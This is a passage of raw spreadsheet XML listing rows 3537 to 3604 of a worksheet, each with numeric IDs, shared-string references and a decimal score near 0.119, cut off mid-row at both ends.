      <c r="C3537" s="2" t="s">
        <v>3339</v>
      </c>
      <c r="D3537" s="2">
        <v>1.0</v>
      </c>
      <c r="E3537" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3537" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="3538" ht="15.75" customHeight="1">
      <c r="A3538" s="1">
        <v>27250.0</v>
      </c>
      <c r="B3538" s="2">
        <v>2.1080402E7</v>
      </c>
      <c r="C3538" s="2" t="s">
        <v>3340</v>
      </c>
      <c r="D3538" s="2">
        <v>1.0</v>
      </c>
      <c r="E3538" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3538" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="3539" ht="15.75" customHeight="1">
      <c r="A3539" s="1">
        <v>29767.0</v>
      </c>
      <c r="B3539" s="2">
        <v>3.4850968E7</v>
      </c>
      <c r="C3539" s="2" t="s">
        <v>3341</v>
      </c>
      <c r="D3539" s="2">
        <v>1.0</v>
      </c>
      <c r="E3539" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3539" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="3540" ht="15.75" customHeight="1">
      <c r="A3540" s="1">
        <v>27674.0</v>
      </c>
      <c r="B3540" s="2">
        <v>2.2932229E7</v>
      </c>
      <c r="C3540" s="2" t="s">
        <v>3342</v>
      </c>
      <c r="D3540" s="2">
        <v>1.0</v>
      </c>
      <c r="E3540" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3540" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="3541" ht="15.75" customHeight="1">
      <c r="A3541" s="1">
        <v>276.0</v>
      </c>
      <c r="B3541" s="2">
        <v>1.5310621E7</v>
      </c>
      <c r="C3541" s="2" t="s">
        <v>3343</v>
      </c>
      <c r="D3541" s="2">
        <v>1.0</v>
      </c>
      <c r="E3541" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3541" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="3542" ht="15.75" customHeight="1">
      <c r="A3542" s="1">
        <v>15154.0</v>
      </c>
      <c r="B3542" s="2">
        <v>4.1969761E7</v>
      </c>
      <c r="C3542" s="2" t="s">
        <v>3344</v>
      </c>
      <c r="D3542" s="2">
        <v>1.0</v>
      </c>
      <c r="E3542" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3542" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="3543" ht="15.75" customHeight="1">
      <c r="A3543" s="1">
        <v>14836.0</v>
      </c>
      <c r="B3543" s="2">
        <v>4.1028361E7</v>
      </c>
      <c r="C3543" s="2" t="s">
        <v>3345</v>
      </c>
      <c r="D3543" s="2">
        <v>1.0</v>
      </c>
      <c r="E3543" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3543" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="3544" ht="15.75" customHeight="1">
      <c r="A3544" s="1">
        <v>17679.0</v>
      </c>
      <c r="B3544" s="2">
        <v>5.0493289E7</v>
      </c>
      <c r="C3544" s="2" t="s">
        <v>3346</v>
      </c>
      <c r="D3544" s="2">
        <v>1.0</v>
      </c>
      <c r="E3544" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3544" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="3545" ht="15.75" customHeight="1">
      <c r="A3545" s="1">
        <v>18392.0</v>
      </c>
      <c r="B3545" s="2">
        <v>5.2605848E7</v>
      </c>
      <c r="C3545" s="2" t="s">
        <v>3347</v>
      </c>
      <c r="D3545" s="2">
        <v>1.0</v>
      </c>
      <c r="E3545" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3545" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="3546" ht="15.75" customHeight="1">
      <c r="A3546" s="1">
        <v>29816.0</v>
      </c>
      <c r="B3546" s="2">
        <v>3.5202925E7</v>
      </c>
      <c r="C3546" s="2" t="s">
        <v>3348</v>
      </c>
      <c r="D3546" s="2">
        <v>1.0</v>
      </c>
      <c r="E3546" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3546" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="3547" ht="15.75" customHeight="1">
      <c r="A3547" s="1">
        <v>1383.0</v>
      </c>
      <c r="B3547" s="2">
        <v>2.6124363E7</v>
      </c>
      <c r="C3547" s="2" t="s">
        <v>3349</v>
      </c>
      <c r="D3547" s="2">
        <v>1.0</v>
      </c>
      <c r="E3547" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3547" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3548" ht="15.75" customHeight="1">
      <c r="A3548" s="1">
        <v>1458.0</v>
      </c>
      <c r="B3548" s="2">
        <v>2.6886952E7</v>
      </c>
      <c r="C3548" s="2" t="s">
        <v>3350</v>
      </c>
      <c r="D3548" s="2">
        <v>1.0</v>
      </c>
      <c r="E3548" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3548" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3549" ht="15.75" customHeight="1">
      <c r="A3549" s="1">
        <v>5379.0</v>
      </c>
      <c r="B3549" s="2">
        <v>4.5406491E7</v>
      </c>
      <c r="C3549" s="2" t="s">
        <v>3351</v>
      </c>
      <c r="D3549" s="2">
        <v>1.0</v>
      </c>
      <c r="E3549" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3549" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3550" ht="15.75" customHeight="1">
      <c r="A3550" s="1">
        <v>6054.0</v>
      </c>
      <c r="B3550" s="2">
        <v>4.7611862E7</v>
      </c>
      <c r="C3550" s="2" t="s">
        <v>3352</v>
      </c>
      <c r="D3550" s="2">
        <v>1.0</v>
      </c>
      <c r="E3550" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3550" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3551" ht="15.75" customHeight="1">
      <c r="A3551" s="1">
        <v>6056.0</v>
      </c>
      <c r="B3551" s="2">
        <v>4.7611862E7</v>
      </c>
      <c r="C3551" s="2" t="s">
        <v>3353</v>
      </c>
      <c r="D3551" s="2">
        <v>1.0</v>
      </c>
      <c r="E3551" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3551" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3552" ht="15.75" customHeight="1">
      <c r="A3552" s="1">
        <v>8287.0</v>
      </c>
      <c r="B3552" s="2">
        <v>5.351178E7</v>
      </c>
      <c r="C3552" s="2" t="s">
        <v>3354</v>
      </c>
      <c r="D3552" s="2">
        <v>1.0</v>
      </c>
      <c r="E3552" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3552" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3553" ht="15.75" customHeight="1">
      <c r="A3553" s="1">
        <v>9118.0</v>
      </c>
      <c r="B3553" s="2">
        <v>5.5209809E7</v>
      </c>
      <c r="C3553" s="2" t="s">
        <v>3355</v>
      </c>
      <c r="D3553" s="2">
        <v>1.0</v>
      </c>
      <c r="E3553" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3553" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3554" ht="15.75" customHeight="1">
      <c r="A3554" s="1">
        <v>16643.0</v>
      </c>
      <c r="B3554" s="2">
        <v>4.7154262E7</v>
      </c>
      <c r="C3554" s="2" t="s">
        <v>3356</v>
      </c>
      <c r="D3554" s="2">
        <v>1.0</v>
      </c>
      <c r="E3554" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3554" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3555" ht="15.75" customHeight="1">
      <c r="A3555" s="1">
        <v>16966.0</v>
      </c>
      <c r="B3555" s="2">
        <v>4.8266694E7</v>
      </c>
      <c r="C3555" s="2" t="s">
        <v>3357</v>
      </c>
      <c r="D3555" s="2">
        <v>1.0</v>
      </c>
      <c r="E3555" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3555" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3556" ht="15.75" customHeight="1">
      <c r="A3556" s="1">
        <v>21895.0</v>
      </c>
      <c r="B3556" s="2">
        <v>2.7816511E7</v>
      </c>
      <c r="C3556" s="2" t="s">
        <v>3358</v>
      </c>
      <c r="D3556" s="2">
        <v>1.0</v>
      </c>
      <c r="E3556" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3556" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3557" ht="15.75" customHeight="1">
      <c r="A3557" s="1">
        <v>24404.0</v>
      </c>
      <c r="B3557" s="2">
        <v>1.0818613E7</v>
      </c>
      <c r="C3557" s="2" t="s">
        <v>3359</v>
      </c>
      <c r="D3557" s="2">
        <v>1.0</v>
      </c>
      <c r="E3557" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3557" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3558" ht="15.75" customHeight="1">
      <c r="A3558" s="1">
        <v>24633.0</v>
      </c>
      <c r="B3558" s="2">
        <v>1.1478E7</v>
      </c>
      <c r="C3558" s="2" t="s">
        <v>3360</v>
      </c>
      <c r="D3558" s="2">
        <v>1.0</v>
      </c>
      <c r="E3558" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3558" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3559" ht="15.75" customHeight="1">
      <c r="A3559" s="1">
        <v>27790.0</v>
      </c>
      <c r="B3559" s="2">
        <v>2.313107E7</v>
      </c>
      <c r="C3559" s="2" t="s">
        <v>3361</v>
      </c>
      <c r="D3559" s="2">
        <v>1.0</v>
      </c>
      <c r="E3559" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3559" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3560" ht="15.75" customHeight="1">
      <c r="A3560" s="1">
        <v>28712.0</v>
      </c>
      <c r="B3560" s="2">
        <v>2.781651E7</v>
      </c>
      <c r="C3560" s="2" t="s">
        <v>3358</v>
      </c>
      <c r="D3560" s="2">
        <v>1.0</v>
      </c>
      <c r="E3560" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3560" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="3561" ht="15.75" customHeight="1">
      <c r="A3561" s="1">
        <v>4003.0</v>
      </c>
      <c r="B3561" s="2">
        <v>4.090148E7</v>
      </c>
      <c r="C3561" s="2" t="s">
        <v>3362</v>
      </c>
      <c r="D3561" s="2">
        <v>1.0</v>
      </c>
      <c r="E3561" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3561" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="3562" ht="15.75" customHeight="1">
      <c r="A3562" s="1">
        <v>12706.0</v>
      </c>
      <c r="B3562" s="2">
        <v>3082150.0</v>
      </c>
      <c r="C3562" s="2" t="s">
        <v>3363</v>
      </c>
      <c r="D3562" s="2">
        <v>1.0</v>
      </c>
      <c r="E3562" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3562" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="3563" ht="15.75" customHeight="1">
      <c r="A3563" s="1">
        <v>4422.0</v>
      </c>
      <c r="B3563" s="2">
        <v>4.2307925E7</v>
      </c>
      <c r="C3563" s="2" t="s">
        <v>3364</v>
      </c>
      <c r="D3563" s="2">
        <v>1.0</v>
      </c>
      <c r="E3563" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3563" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="3564" ht="15.75" customHeight="1">
      <c r="A3564" s="1">
        <v>9195.0</v>
      </c>
      <c r="B3564" s="2">
        <v>5.5394838E7</v>
      </c>
      <c r="C3564" s="2" t="s">
        <v>3365</v>
      </c>
      <c r="D3564" s="2">
        <v>1.0</v>
      </c>
      <c r="E3564" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3564" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="3565" ht="15.75" customHeight="1">
      <c r="A3565" s="1">
        <v>11272.0</v>
      </c>
      <c r="B3565" s="2">
        <v>2.0725626E7</v>
      </c>
      <c r="C3565" s="2" t="s">
        <v>3366</v>
      </c>
      <c r="D3565" s="2">
        <v>1.0</v>
      </c>
      <c r="E3565" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3565" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="3566" ht="15.75" customHeight="1">
      <c r="A3566" s="1">
        <v>12854.0</v>
      </c>
      <c r="B3566" s="2">
        <v>3.1832515E7</v>
      </c>
      <c r="C3566" s="2" t="s">
        <v>3367</v>
      </c>
      <c r="D3566" s="2">
        <v>1.0</v>
      </c>
      <c r="E3566" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3566" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="3567" ht="15.75" customHeight="1">
      <c r="A3567" s="1">
        <v>19340.0</v>
      </c>
      <c r="B3567" s="2">
        <v>5.5353759E7</v>
      </c>
      <c r="C3567" s="2" t="s">
        <v>3368</v>
      </c>
      <c r="D3567" s="2">
        <v>1.0</v>
      </c>
      <c r="E3567" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3567" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="3568" ht="15.75" customHeight="1">
      <c r="A3568" s="1">
        <v>8449.0</v>
      </c>
      <c r="B3568" s="2">
        <v>5.3965937E7</v>
      </c>
      <c r="C3568" s="2" t="s">
        <v>3369</v>
      </c>
      <c r="D3568" s="2">
        <v>1.0</v>
      </c>
      <c r="E3568" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3568" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="3569" ht="15.75" customHeight="1">
      <c r="A3569" s="1">
        <v>16147.0</v>
      </c>
      <c r="B3569" s="2">
        <v>4.557694E7</v>
      </c>
      <c r="C3569" s="2" t="s">
        <v>3370</v>
      </c>
      <c r="D3569" s="2">
        <v>1.0</v>
      </c>
      <c r="E3569" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3569" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="3570" ht="15.75" customHeight="1">
      <c r="A3570" s="1">
        <v>18766.0</v>
      </c>
      <c r="B3570" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C3570" s="2" t="s">
        <v>3371</v>
      </c>
      <c r="D3570" s="2">
        <v>1.0</v>
      </c>
      <c r="E3570" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3570" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="3571" ht="15.75" customHeight="1">
      <c r="A3571" s="1">
        <v>329.0</v>
      </c>
      <c r="B3571" s="2">
        <v>1.577624E7</v>
      </c>
      <c r="C3571" s="2" t="s">
        <v>3372</v>
      </c>
      <c r="D3571" s="2">
        <v>1.0</v>
      </c>
      <c r="E3571" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3571" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3572" ht="15.75" customHeight="1">
      <c r="A3572" s="1">
        <v>340.0</v>
      </c>
      <c r="B3572" s="2">
        <v>1.5879764E7</v>
      </c>
      <c r="C3572" s="2" t="s">
        <v>3373</v>
      </c>
      <c r="D3572" s="2">
        <v>1.0</v>
      </c>
      <c r="E3572" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3572" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3573" ht="15.75" customHeight="1">
      <c r="A3573" s="1">
        <v>726.0</v>
      </c>
      <c r="B3573" s="2">
        <v>2.0761026E7</v>
      </c>
      <c r="C3573" s="2" t="s">
        <v>3374</v>
      </c>
      <c r="D3573" s="2">
        <v>1.0</v>
      </c>
      <c r="E3573" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3573" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3574" ht="15.75" customHeight="1">
      <c r="A3574" s="1">
        <v>1282.0</v>
      </c>
      <c r="B3574" s="2">
        <v>2.5547719E7</v>
      </c>
      <c r="C3574" s="2" t="s">
        <v>3375</v>
      </c>
      <c r="D3574" s="2">
        <v>1.0</v>
      </c>
      <c r="E3574" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3574" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3575" ht="15.75" customHeight="1">
      <c r="A3575" s="1">
        <v>2264.0</v>
      </c>
      <c r="B3575" s="2">
        <v>3.242843E7</v>
      </c>
      <c r="C3575" s="2" t="s">
        <v>3376</v>
      </c>
      <c r="D3575" s="2">
        <v>1.0</v>
      </c>
      <c r="E3575" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3575" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3576" ht="15.75" customHeight="1">
      <c r="A3576" s="1">
        <v>2967.0</v>
      </c>
      <c r="B3576" s="2">
        <v>3.608198E7</v>
      </c>
      <c r="C3576" s="2" t="s">
        <v>3377</v>
      </c>
      <c r="D3576" s="2">
        <v>1.0</v>
      </c>
      <c r="E3576" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3576" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3577" ht="15.75" customHeight="1">
      <c r="A3577" s="1">
        <v>3559.0</v>
      </c>
      <c r="B3577" s="2">
        <v>3.8840808E7</v>
      </c>
      <c r="C3577" s="2" t="s">
        <v>3378</v>
      </c>
      <c r="D3577" s="2">
        <v>1.0</v>
      </c>
      <c r="E3577" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3577" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3578" ht="15.75" customHeight="1">
      <c r="A3578" s="1">
        <v>4302.0</v>
      </c>
      <c r="B3578" s="2">
        <v>4.1948702E7</v>
      </c>
      <c r="C3578" s="2" t="s">
        <v>3379</v>
      </c>
      <c r="D3578" s="2">
        <v>1.0</v>
      </c>
      <c r="E3578" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3578" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3579" ht="15.75" customHeight="1">
      <c r="A3579" s="1">
        <v>5129.0</v>
      </c>
      <c r="B3579" s="2">
        <v>4.46039E7</v>
      </c>
      <c r="C3579" s="2" t="s">
        <v>3380</v>
      </c>
      <c r="D3579" s="2">
        <v>1.0</v>
      </c>
      <c r="E3579" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3579" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3580" ht="15.75" customHeight="1">
      <c r="A3580" s="1">
        <v>5813.0</v>
      </c>
      <c r="B3580" s="2">
        <v>4.6831614E7</v>
      </c>
      <c r="C3580" s="2" t="s">
        <v>3381</v>
      </c>
      <c r="D3580" s="2">
        <v>1.0</v>
      </c>
      <c r="E3580" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3580" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3581" ht="15.75" customHeight="1">
      <c r="A3581" s="1">
        <v>6077.0</v>
      </c>
      <c r="B3581" s="2">
        <v>4.7656435E7</v>
      </c>
      <c r="C3581" s="2" t="s">
        <v>3382</v>
      </c>
      <c r="D3581" s="2">
        <v>1.0</v>
      </c>
      <c r="E3581" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3581" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3582" ht="15.75" customHeight="1">
      <c r="A3582" s="1">
        <v>7140.0</v>
      </c>
      <c r="B3582" s="2">
        <v>5.0443037E7</v>
      </c>
      <c r="C3582" s="2" t="s">
        <v>3383</v>
      </c>
      <c r="D3582" s="2">
        <v>1.0</v>
      </c>
      <c r="E3582" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3582" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3583" ht="15.75" customHeight="1">
      <c r="A3583" s="1">
        <v>7218.0</v>
      </c>
      <c r="B3583" s="2">
        <v>5.0631473E7</v>
      </c>
      <c r="C3583" s="2" t="s">
        <v>3384</v>
      </c>
      <c r="D3583" s="2">
        <v>1.0</v>
      </c>
      <c r="E3583" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3583" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3584" ht="15.75" customHeight="1">
      <c r="A3584" s="1">
        <v>7468.0</v>
      </c>
      <c r="B3584" s="2">
        <v>5.1280169E7</v>
      </c>
      <c r="C3584" s="2" t="s">
        <v>3385</v>
      </c>
      <c r="D3584" s="2">
        <v>1.0</v>
      </c>
      <c r="E3584" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3584" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3585" ht="15.75" customHeight="1">
      <c r="A3585" s="1">
        <v>7969.0</v>
      </c>
      <c r="B3585" s="2">
        <v>5.2696347E7</v>
      </c>
      <c r="C3585" s="2" t="s">
        <v>3386</v>
      </c>
      <c r="D3585" s="2">
        <v>1.0</v>
      </c>
      <c r="E3585" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3585" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3586" ht="15.75" customHeight="1">
      <c r="A3586" s="1">
        <v>8054.0</v>
      </c>
      <c r="B3586" s="2">
        <v>5.288871E7</v>
      </c>
      <c r="C3586" s="2" t="s">
        <v>3387</v>
      </c>
      <c r="D3586" s="2">
        <v>1.0</v>
      </c>
      <c r="E3586" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3586" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3587" ht="15.75" customHeight="1">
      <c r="A3587" s="1">
        <v>8872.0</v>
      </c>
      <c r="B3587" s="2">
        <v>5.4747496E7</v>
      </c>
      <c r="C3587" s="2" t="s">
        <v>3388</v>
      </c>
      <c r="D3587" s="2">
        <v>1.0</v>
      </c>
      <c r="E3587" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3587" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3588" ht="15.75" customHeight="1">
      <c r="A3588" s="1">
        <v>10237.0</v>
      </c>
      <c r="B3588" s="2">
        <v>5.7524829E7</v>
      </c>
      <c r="C3588" s="2" t="s">
        <v>3389</v>
      </c>
      <c r="D3588" s="2">
        <v>1.0</v>
      </c>
      <c r="E3588" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3588" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3589" ht="15.75" customHeight="1">
      <c r="A3589" s="1">
        <v>12669.0</v>
      </c>
      <c r="B3589" s="2">
        <v>3.0580056E7</v>
      </c>
      <c r="C3589" s="2" t="s">
        <v>3390</v>
      </c>
      <c r="D3589" s="2">
        <v>1.0</v>
      </c>
      <c r="E3589" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3589" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3590" ht="15.75" customHeight="1">
      <c r="A3590" s="1">
        <v>14773.0</v>
      </c>
      <c r="B3590" s="2">
        <v>4.0869663E7</v>
      </c>
      <c r="C3590" s="2" t="s">
        <v>3391</v>
      </c>
      <c r="D3590" s="2">
        <v>1.0</v>
      </c>
      <c r="E3590" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3590" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3591" ht="15.75" customHeight="1">
      <c r="A3591" s="1">
        <v>16827.0</v>
      </c>
      <c r="B3591" s="2">
        <v>4.7875533E7</v>
      </c>
      <c r="C3591" s="2" t="s">
        <v>3392</v>
      </c>
      <c r="D3591" s="2">
        <v>1.0</v>
      </c>
      <c r="E3591" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3591" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3592" ht="15.75" customHeight="1">
      <c r="A3592" s="1">
        <v>19956.0</v>
      </c>
      <c r="B3592" s="2">
        <v>5.7529375E7</v>
      </c>
      <c r="C3592" s="2" t="s">
        <v>3393</v>
      </c>
      <c r="D3592" s="2">
        <v>1.0</v>
      </c>
      <c r="E3592" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3592" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3593" ht="15.75" customHeight="1">
      <c r="A3593" s="1">
        <v>19994.0</v>
      </c>
      <c r="B3593" s="2">
        <v>5.7662637E7</v>
      </c>
      <c r="C3593" s="2" t="s">
        <v>3394</v>
      </c>
      <c r="D3593" s="2">
        <v>1.0</v>
      </c>
      <c r="E3593" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3593" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3594" ht="15.75" customHeight="1">
      <c r="A3594" s="1">
        <v>20024.0</v>
      </c>
      <c r="B3594" s="2">
        <v>6520904.0</v>
      </c>
      <c r="C3594" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="D3594" s="2">
        <v>1.0</v>
      </c>
      <c r="E3594" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3594" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3595" ht="15.75" customHeight="1">
      <c r="A3595" s="1">
        <v>32573.0</v>
      </c>
      <c r="B3595" s="2">
        <v>5769472.0</v>
      </c>
      <c r="C3595" s="2" t="s">
        <v>3396</v>
      </c>
      <c r="D3595" s="2">
        <v>1.0</v>
      </c>
      <c r="E3595" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3595" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="3596" ht="15.75" customHeight="1">
      <c r="A3596" s="1">
        <v>1406.0</v>
      </c>
      <c r="B3596" s="2">
        <v>2.6320178E7</v>
      </c>
      <c r="C3596" s="2" t="s">
        <v>3397</v>
      </c>
      <c r="D3596" s="2">
        <v>1.0</v>
      </c>
      <c r="E3596" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3596" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="3597" ht="15.75" customHeight="1">
      <c r="A3597" s="1">
        <v>9575.0</v>
      </c>
      <c r="B3597" s="2">
        <v>5.6065829E7</v>
      </c>
      <c r="C3597" s="2" t="s">
        <v>3398</v>
      </c>
      <c r="D3597" s="2">
        <v>1.0</v>
      </c>
      <c r="E3597" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3597" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="3598" ht="15.75" customHeight="1">
      <c r="A3598" s="1">
        <v>11372.0</v>
      </c>
      <c r="B3598" s="2">
        <v>2.1408913E7</v>
      </c>
      <c r="C3598" s="2" t="s">
        <v>3399</v>
      </c>
      <c r="D3598" s="2">
        <v>1.0</v>
      </c>
      <c r="E3598" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3598" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="3599" ht="15.75" customHeight="1">
      <c r="A3599" s="1">
        <v>3967.0</v>
      </c>
      <c r="B3599" s="2">
        <v>4.0747076E7</v>
      </c>
      <c r="C3599" s="2" t="s">
        <v>3400</v>
      </c>
      <c r="D3599" s="2">
        <v>1.0</v>
      </c>
      <c r="E3599" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3599" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="3600" ht="15.75" customHeight="1">
      <c r="A3600" s="1">
        <v>14090.0</v>
      </c>
      <c r="B3600" s="2">
        <v>3.7724922E7</v>
      </c>
      <c r="C3600" s="2" t="s">
        <v>3401</v>
      </c>
      <c r="D3600" s="2">
        <v>1.0</v>
      </c>
      <c r="E3600" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3600" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="3601" ht="15.75" customHeight="1">
      <c r="A3601" s="1">
        <v>15071.0</v>
      </c>
      <c r="B3601" s="2">
        <v>4.1719746E7</v>
      </c>
      <c r="C3601" s="2" t="s">
        <v>3402</v>
      </c>
      <c r="D3601" s="2">
        <v>1.0</v>
      </c>
      <c r="E3601" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3601" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="3602" ht="15.75" customHeight="1">
      <c r="A3602" s="1">
        <v>15419.0</v>
      </c>
      <c r="B3602" s="2">
        <v>4.2886131E7</v>
      </c>
      <c r="C3602" s="2" t="s">
        <v>3403</v>
      </c>
      <c r="D3602" s="2">
        <v>1.0</v>
      </c>
      <c r="E3602" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3602" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="3603" ht="15.75" customHeight="1">
      <c r="A3603" s="1">
        <v>29878.0</v>
      </c>
      <c r="B3603" s="2">
        <v>3.6037735E7</v>
      </c>
      <c r="C3603" s="2" t="s">
        <v>3404</v>
      </c>
      <c r="D3603" s="2">
        <v>1.0</v>
      </c>
      <c r="E3603" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3603" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="3604" ht="15.75" customHeight="1">
      <c r="A3604" s="1">
        <v>835.0</v>
      </c>
      <c r="B3604" s="2">
        <v>2.1585966E7</v>
      </c>
